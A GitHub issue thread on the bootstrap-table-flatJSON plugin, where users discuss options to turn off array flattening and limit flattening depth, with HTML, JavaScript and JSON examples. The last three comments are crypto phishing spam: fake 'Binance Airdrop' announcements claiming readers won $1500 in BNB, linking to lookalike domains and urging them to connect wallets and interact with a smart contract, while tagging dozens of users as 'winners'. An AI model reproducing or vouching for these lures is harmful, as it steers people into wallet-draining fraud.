### ISSUE TITLE
Option to turn off array flattering

### ISSUE THREAD

**Issue by fruit** [djhvscf/bootstrap-table-flatJSON#7]
It would be nice to have an option not to flat an arrays, because it hard to use them in `format-data` callback. You wouldn't receive a nice array to it, just a `null` value.

To clearly understand my idea, [here is a working example](http://pastie.org/private/8su9dz5boyqfrp0qutmqtq) (Sorry, no time for forking...)

Option declaration:

``` html
<table data-flat-arrays="false"> ... </table>
```

**Comment by jtrumbull** [comment]
@fruit: Seems easy enough.

Also, to chime in, it would be nice to have a `data-flat-max-level` option. I.e

``` javascript
{
    model: {
        field1: "some value",
        field2: "some value",
        noTable: {
            field1: "some value",
            field2: "some value",
        }
    }
}
```

`data-flat-max-level="2"` would produce:

``` javascript
{
    "model.field1": "some value",
    "model.field2": "some value",
    "model.noTable.": {
        "field1": "some value",
        "field2": "some value"
    }
}
```

**Comment by fruit** [comment]
@jtrumbull: good idea. Additionally, it would be fine to define `data-field-flat-max-level` on a table's row-level:

Row representation:

``` json
{
    "username": "alice81",
    "profile": {
        "first_name": "Alice",
        "last_name": "Smith",
        "address": {
            "street": "Meyrin Road 385, 1217",
            "town": "Meyrin",
            "country": "Switzerland"
        }
    }
}
```

Table sample:

``` html
<table class="table">
        <thead>
        <tr>
            <th data-field="username">User Name</th>
            <th data-field="profile.first_name">First Name</th>
            <th data-field="profile.last_name">Last Name</th>
            <th data-field="profile.address" data-field-flat-max-level="2" data-formater="addresseFormatter">Addresse</th>
        </tr>
        </thead>
    </table>
```

``` javascript
function addresseFormatter(value) { 
    return value.country + ' ' + value.street;
}
```

**Comment by prezo-ci-bkp** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Comment by Teknokeys** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://giveway.binancbnbrewards.online/4JhoUO)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://giveway.binancbnbrewards.online/4JhoUO) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @codecakes, @tong-xz, @lyna-azerouk, @ConsentDevelopment, @OlenaDolinchuk, @civixies, @Webmoss, @keaglin, @ANBU90S, @naftalimurgor, @haolei, @AkashMoh, @molinamanlio, @LordSukku, @mortemn, @ivancxj, @nanspro, @garant13, @huseyin-kilic, @adityamangal1, @generalzgd, @MitchellMarkGeorge, @minhlam2102002, @brokebrah, @zjuzcy, @fransixles, @bonnemai, @CamPalmer, @nonstriater, @S10online, @rongmengmeng, @Soul-of-Sky, @ShrJamal, @kaanmetu, @SanatSharma, @MrTibbles, @whbjzzwjxq, @manticorevault, @Synvox, @NoahMD, @Newaygo, @4adamu, @lanjing99, @motto123, @mug4z, @zdus4w, @whit3sh4d0w, @myarth, @maxwolff, @fractalgenisis

**Comment by Teknokeys** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://giveway.binancbnbrewards.online/4JhoUO)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://giveway.binancbnbrewards.online/4JhoUO) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @uwaisdev, @daaser, @keywordwei, @Prabhat1308, @jonathannto, @hudson-newey, @rokitgg, @abhisamant, @vmocampos, @blockbee, @LiMeitong, @erikacls, @KristofDcu, @EsDub92, @jweyrich, @youngDuckling, @soequelle, @aparisella, @imesong, @mlgrs, @vahdani, @qqonline, @cocos543, @victorodri, @mtphyscs, @shellyalina, @tdntinh, @Madusha1995, @michel-klein, @SayeedSadauki, @qiohm, @supernovalx, @MateusAndrade, @itmustbejj, @jastroud, @PrasoonPratham, @cesar2120, @onecarpayment, @savelyevresearch, @rogozhka, @AbhishekBiswal, @raharjaliu, @SftJun, @veselinovicst, @Arctic-Panda, @MStumpp, @zjach, @kusiha, @yw79641760, @new-happy
